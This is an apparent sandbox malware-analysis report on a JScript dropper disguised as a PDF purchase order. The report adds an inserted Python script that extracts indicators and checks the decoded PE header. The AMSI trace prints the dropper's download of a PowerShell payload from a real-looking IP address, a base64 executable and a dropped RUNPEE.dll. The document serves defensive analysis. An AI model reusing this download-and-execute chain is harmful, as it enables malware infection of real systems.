                  Source: Binary string: CZG3HF22.pdbH source: x.exe, 0000000A.00000000.1404811393.0000000000842000.00000002.00000001.01000000.00000008.sdmp, x.exe.8.dr
                  Source: Binary string: CZG3HF22.pdb source: x.exe, 0000000A.00000000.1404811393.0000000000842000.00000002.00000001.01000000.00000008.sdmp, x.exe.8.dr

                  Data Obfuscation

                  Source: C:\Windows\System32\wscript.exe | Anti Malware Scan Interface: WScript.Shell%22");IHost.Name();ITextStream.WriteLine(" entry:233 o:Windows%20Script%20Host f:CreateObject a0:%22WScript.Shell%22");IHost.CreateObject("WScript.Shell");IHost.Name();IWshShell3._00000000();ITextStream.WriteLine(" exit:233 o:Windows%20Script%20Host f:CreateObject r:");ITextStream.WriteLine(" entry:251 f:_0x5b7d25 a0:355 a1:%22BK7%24%22");ITextStream.WriteLine(" exit:251 f:_0x5b7d25 r:%22CreateObject%22");ITextStream.WriteLine(" entry:257 f:_0x5b7d25 a0:357 a1:%22%25J%5D%40%22");ITextStream.WriteLine(" exit:257 f:_0x5b7d25 r:%22Scripting.FileSystemObject%22");IHost.Name();ITextStream.WriteLine(" entry:247 o:Windows%20Script%20Host f:CreateObject a0:%22Scripting.FileSystemObject%22");IHost.CreateObject("Scripting.FileSystemObject");IHost.Name();IFileSystem3._00000000();ITextStream.WriteLine(" exit:247 o:Windows%20Script%20Host f:CreateObject r:");ITextStream.WriteLine(" entry:267 f:_0x5b7d25 a0:352 a1:%22Ga%5Eb%22");ITextStream.WriteLine(" exit:267 f:_0x5b7d25 r:%22CreateObject%22");ITextStream.WriteLine(" entry:273 f:_0x49b702 a0:383");ITextStream.WriteLine(" exit:273 f:_0x49b702 r:%22MSXML2.XMLHTTP%22");IHost.Name();ITextStream.WriteLine(" entry:263 o:Windows%20Script%20Host f:CreateObject a0:%22MSXML2.XMLHTTP%22");IHost.CreateObject("MSXML2.XMLHTTP");IHost.Name();IServerXMLHTTPRequest2._00000000();ITextStream.WriteLine(" exit:263 o:Windows%20Script%20Host f:CreateObject r:");IFileSystem3._00000000();ITextStream.WriteLine(" entry:317 o: f:FolderExists a0:%22C%3A%5CTemp%22");IFileSystem3.FolderExists("C:\Temp");IFileSystem3._00000000();ITextStream.WriteLine(" exit:317 o: f:FolderExists r:false");ITextStream.WriteLine(" entry:328 f:_0x49b702 a0:372");ITextStream.WriteLine(" exit:328 f:_0x49b702 r:%22CreateFolder%22");IFileSystem3._00000000();ITextStream.WriteLine(" entry:324 o: f:CreateFolder a0:%22C%3A%5CTemp%22");IFileSystem3.CreateFolder("C:\Temp");IFileSystem3._00000000();IFolder.Path();ITextStream.WriteLine(" exit:324 o: f:CreateFolder r:C%3A%5CTemp");ITextStream.WriteLine(" entry:1003 f:DownloadScript a0:%22http%3A%2F%2F176.65.144.3%2Fdev%2Fbelieve.ps1%22 a1:%22C%3A%5CTemp%5CWTRTRWFSHS.ps1%22");ITextStream.WriteLine(" exec:802 f:DownloadScript");ITextStream.WriteLine(" entry:820 f:_0x15e269 a0:353");ITextStream.WriteLine(" exit:820 f:_0x15e269 r:%22GET%22");IServerXMLHTTPRequest2._00000000();ITextStream.WriteLine(" entry:814 o: f:Open a0:%22GET%22 a1:%22http%3A%2F%2F176.65.144.3%2Fdev%2Fbelieve.ps1%22 a2:false");IServerXMLHTTPRequest2.open("GET", "http://176.65.144.3/dev/believe.ps1", "false");IServerXMLHTTPRequest2._00000000();ITextStream.WriteLine(" exit:814 o: f:Open r:undefined");IServerXMLHTTPRequest2._00000000();ITextStream.WriteLine(" entry:827 o: f:Send");IServerXMLHTTPRequest2.send();ITextStream.WriteLine(" exit:257 f:_0x5b7d25 r:%22Scripting.FileSystemObject%22");IHost.Name();ITextStream.WriteLine(" entry:247 o:Windows%20Script%20Host f:CreateObject a0:%22Scripting.FileSystemObject%22");IHost.CreateObject("Scripting.Fi
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Anti Malware Scan Interface: FromBase64String("TVqQAAMAAAAEAAAA//8AALgAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAgAAAAA4fug4AtAnNIbgBTM0hVGhpcyBwcm9ncmFtIGNhbm5vdCBiZSBydW4gaW4gRE9TIG1vZGUuDQ0KJAAAAAAAAABQRQAATAEDAD
                  Source: PO-2513203-PDF.js | Initial file: High amount of function use 6
                  Source: x.exe.8.dr | Static PE information: 0xB41A313D [Thu Oct 1 09:37:01 2065 UTC]
                  Source: C:\Users\user\AppData\Local\Temp\x.exe | Code function: 10_2_052627B4 push esp; ret 10_2_052627B7
                  Source: C:\Users\user\AppData\Local\Temp\x.exe | Code function: 10_2_05262C97 push esi; iretd 10_2_05262CEC
                  Source: C:\Users\user\AppData\Local\Temp\x.exe | Code function: 10_2_00E99D22 push esp; ret 10_2_00E99D23
                  Source: C:\Users\user\AppData\Local\Temp\x.exe | Code function: 11_2_0684890D push es; ret 11_2_06848920
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File created: C:\Users\user\AppData\Local\Temp\x.exe
                  Source: C:\Users\user\AppData\Local\Temp\x.exe | File created: C:\Users\user\AppData\Local\Temp\RUNPEE.dll
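The wscript.exe AMSI trace, the PowerShell FromBase64String buffer and the x.exe link time above are the items a responder pulls out first. The script below is an added example, not Joe Sandbox code and not the sample's own code: it parses the instrumented-call grammar visible in the trace (entry:<line> o:<object> f:<function> a<n>:<URL-encoded argument>, a format inferred from the excerpt rather than documented anywhere), extracts the COM ProgIDs, download URL, HTTP verb and file paths, decodes the truncated base64 prefix far enough to confirm it is a PE image with a valid e_lfanew and PE signature, and renders the COFF timestamp. The trace and base64 excerpts are copied from the report; every function name and the "reference epoch" used for the future-date check are the author's own assumptions.

```python
"""Triage of the AMSI buffers and PE flags listed in this report.

Added example; neither Joe Sandbox code nor the sample's own code.  The two
excerpts below are copied from the report, the trace grammar is inferred from
them, and all function names are the author's own.
"""
import base64
import datetime
import re
import struct
from urllib.parse import unquote

# Excerpt of the wscript.exe AMSI buffer: the instrumented JScript logs every
# call it makes, with the arguments URL-encoded.
WSCRIPT_AMSI = (
    'ITextStream.WriteLine(" entry:233 o:Windows%20Script%20Host f:CreateObject a0:%22WScript.Shell%22");'
    'ITextStream.WriteLine(" entry:247 o:Windows%20Script%20Host f:CreateObject a0:%22Scripting.FileSystemObject%22");'
    'ITextStream.WriteLine(" entry:263 o:Windows%20Script%20Host f:CreateObject a0:%22MSXML2.XMLHTTP%22");'
    'ITextStream.WriteLine(" entry:317 o: f:FolderExists a0:%22C%3A%5CTemp%22");'
    'ITextStream.WriteLine(" entry:324 o: f:CreateFolder a0:%22C%3A%5CTemp%22");'
    'ITextStream.WriteLine(" entry:1003 f:DownloadScript a0:%22http%3A%2F%2F176.65.144.3%2Fdev%2Fbelieve.ps1%22 a1:%22C%3A%5CTemp%5CWTRTRWFSHS.ps1%22");'
    'ITextStream.WriteLine(" entry:814 o: f:Open a0:%22GET%22 a1:%22http%3A%2F%2F176.65.144.3%2Fdev%2Fbelieve.ps1%22 a2:false");'
)

# Start of the powershell.exe AMSI buffer: the argument handed to FromBase64String,
# cut off by the sandbox mid-string.
POWERSHELL_B64 = "TVqQAAMAAAAEAAAA//8AALgAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAgAAAAA4fug4AtAnNIbgBTM0hVGhpcyBwcm9ncmFtIGNhbm5vdCBiZSBydW4gaW4gRE9TIG1vZGUuDQ0KJAAAAAAAAABQRQAATAEDAD"

# One instrumented call: entry:<line> [o:<object>] f:<func> [a0:<arg> a1:<arg> ...]
# Arguments end at whitespace or at the closing quote of the WriteLine literal.
ENTRY_RE = re.compile(r'entry:(\d+) (?:o:(\S*) )?f:(\w+)((?: a\d+:[^\s"]+)*)')
ARG_RE = re.compile(r'a(\d+):([^\s"]+)')


def parse_trace(buf):
    """Return (line, object, function, [decoded args]) for every instrumented call."""
    calls = []
    for m in ENTRY_RE.finditer(buf):
        args = [unquote(v).strip('"') for _, v in ARG_RE.findall(m.group(4))]
        calls.append((int(m.group(1)), unquote(m.group(2) or ""), m.group(3), args))
    return calls


def extract_iocs(calls):
    """Pull the indicators a responder wants: COM ProgIDs, URLs, file paths, HTTP verbs."""
    iocs = {"com_objects": [], "urls": set(), "paths": set(), "http_methods": set()}
    for _line, _obj, func, args in calls:
        if func == "CreateObject" and args:
            iocs["com_objects"].append(args[0])
        elif func == "Open" and len(args) >= 2:
            iocs["http_methods"].add(args[0].upper())
        for arg in args:
            if re.match(r"https?://", arg, re.IGNORECASE):
                iocs["urls"].add(arg)
            elif re.match(r"[A-Za-z]:\\", arg):
                iocs["paths"].add(arg)
    return iocs


def inspect_base64_pe(b64):
    """Decode a possibly truncated base64 blob and check the MZ/PE structure.

    AMSI buffers are cut off mid-string, so the tail is trimmed to a multiple of
    four characters before decoding instead of failing on bad padding.
    """
    usable = b64[: len(b64) - len(b64) % 4]
    data = base64.b64decode(usable)
    result = {
        "is_mz": data[:2] == b"MZ",
        "dos_stub": b"This program cannot be run in DOS mode" in data,
        "e_lfanew": None,
        "pe_signature": False,
        "machine": None,  # 0x14C = i386, 0x8664 = x86-64
    }
    if result["is_mz"] and len(data) >= 0x40:
        e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
        result["e_lfanew"] = e_lfanew
        if len(data) >= e_lfanew + 6:
            result["pe_signature"] = data[e_lfanew:e_lfanew + 4] == b"PE\x00\x00"
            result["machine"] = struct.unpack_from("<H", data, e_lfanew + 4)[0]
    return result


def describe_timestamp(ts, reference_epoch):
    """Render a COFF TimeDateStamp as UTC and say whether it post-dates the reference moment."""
    when = datetime.datetime.fromtimestamp(ts, tz=datetime.timezone.utc)
    return {"utc": when.isoformat(), "in_future": ts > reference_epoch}


if __name__ == "__main__":
    calls = parse_trace(WSCRIPT_AMSI)
    iocs = extract_iocs(calls)
    print("COM objects:", iocs["com_objects"])
    print("URLs:", sorted(iocs["urls"]))
    print("Paths:", sorted(iocs["paths"]))
    print("Dropped payload header:", inspect_base64_pe(POWERSHELL_B64))
    # 1_741_000_000 is an assumed analysis time (early March 2025), not a value from the report.
    print("x.exe link time:", describe_timestamp(0xB41A313D, 1_741_000_000))
```

One caveat on the timestamp flag: x.exe loads mscoree.dll and the CLR's vcruntime140_clr0400.dll, so it is a .NET assembly, and Roslyn's deterministic builds fill TimeDateStamp with a content-derived value with the high bit set rather than the real link time, which is exactly the shape 0xB41A313D has. A far-future date on a .NET binary is therefore weak evidence of tampering on its own; the download chain, the base64 PE in the PowerShell buffer and the dropped RUNPEE.dll are the stronger signals here.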
                  Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exe Memory allocated: E90000 memory reserve | memory write watch
                  Source: C:\Users\user\AppData\Local\Temp\x.exe Memory allocated: 2C00000 memory reserve | memory write watch
                  Source: C:\Users\user\AppData\Local\Temp\x.exe Memory allocated: 4C00000 memory reserve | memory write watch
                  Source: C:\Users\user\AppData\Local\Temp\x.exe Memory allocated: 5280000 memory reserve | memory write watch
                  Source: C:\Users\user\AppData\Local\Temp\x.exe Memory allocated: 6280000 memory reserve | memory write watch
                  Source: C:\Users\user\AppData\Local\Temp\x.exe Memory allocated: 63B0000 memory reserve | memory write watch
                  Source: C:\Users\user\AppData\Local\Temp\x.exe Memory allocated: 73B0000 memory reserve | memory write watch
                  Source: C:\Users\user\AppData\Local\Temp\x.exe Memory allocated: EC0000 memory reserve | memory write watch
                  Source: C:\Users\user\AppData\Local\Temp\x.exe Memory allocated: 2BF0000 memory reserve | memory write watch
                  Source: C:\Users\user\AppData\Local\Temp\x.exe Memory allocated: 1260000 memory reserve | memory write watch
                  Source: C:\Users\user\AppData\Local\Temp\x.exe Code function: 11_2_00EC25B0 sgdt fword ptr [eax]
                  Source: C:\Users\user\AppData\Local\Temp\x.exe Code function: 11_2_00EC25B0 sidt fword ptr [ebp+edx*2-19h]
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
                  Source: C:\Users\user\AppData\Local\Temp\x.exe Thread delayed: delay time: 922337203685477
                  Source: C:\Users\user\AppData\Local\Temp\x.exe Thread delayed: delay time: 922337203685477
                  Source: C:\Users\user\AppData\Local\Temp\x.exe Thread delayed: delay time: 600000
                  Source: C:\Users\user\AppData\Local\Temp\x.exe Thread delayed: delay time: 599890
                  Source: C:\Users\user\AppData\Local\Temp\x.exe Thread delayed: delay time: 599781
                  Source: C:\Users\user\AppData\Local\Temp\x.exe Thread delayed: delay time: 599672
                  Source: C:\Users\user\AppData\Local\Temp\x.exe Thread delayed: delay time: 599562
                  Source: C:\Users\user\AppData\Local\Temp\x.exe Thread delayed: delay time: 599453
                  Source: C:\Users\user\AppData\Local\Temp\x.exe Thread delayed: delay time: 599343
                  Source: C:\Users\user\AppData\Local\Temp\x.exe Thread delayed: delay time: 599234
                  Source: C:\Users\user\AppData\Local\Temp\x.exe Thread delayed: delay time: 599124
                  Source: C:\Users\user\AppData\Local\Temp\x.exe Thread delayed: delay time: 599015
                  Source: C:\Users\user\AppData\Local\Temp\x.exe Thread delayed: delay time: 598906
                  Source: C:\Users\user\AppData\Local\Temp\x.exe Thread delayed: delay time: 598797
                  Source: C:\Users\user\AppData\Local\Temp\x.exe Thread delayed: delay time: 598687
                  Source: C:\Users\user\AppData\Local\Temp\x.exe Thread delayed: delay time: 598578
                  Source: C:\Users\user\AppData\Local\Temp\x.exe Thread delayed: delay time: 598468
                  Source: C:\Users\user\AppData\Local\Temp\x.exe Thread delayed: delay time: 598359
                  Source: C:\Users\user\AppData\Local\Temp\x.exe Thread delayed: delay time: 598250
                  Source: C:\Users\user\AppData\Local\Temp\x.exe Thread delayed: delay time: 598140
                  Source: C:\Users\user\AppData\Local\Temp\x.exe Thread delayed: delay time: 598031
                  Source: C:\Users\user\AppData\Local\Temp\x.exe Thread delayed: delay time: 597922
                  Source: C:\Users\user\AppData\Local\Temp\x.exe Thread delayed: delay time: 597812
